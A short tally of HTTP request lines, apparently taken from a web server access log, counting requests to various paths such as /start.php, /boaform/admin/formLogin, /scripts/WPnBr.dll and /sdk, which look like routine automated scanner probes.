1 GET /start.cgi HTTP/1.1
1 GET /start.html HTTP/1.1
1 GET /start.jhtml HTTP/1.1
1 GET /start.jsa HTTP/1.1
1 GET /start.jsp HTTP/1.1
1 GET /start.php HTTP/1.1
1 GET /start.pl HTTP/1.1
1 GET /start.shtml HTTP/1.1
1 GET default.asp HTTP/1.1
1 HEAD /Core/Skin/Login.aspx HTTP/1.1
1 HEAD / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
4 POST /boaform/admin/formLogin HTTP/1.1
1 POST /scripts/WPnBr.dll HTTP/1.1
1 POST /sdk HTTP/1.1
3 PRI * HTTP/2.0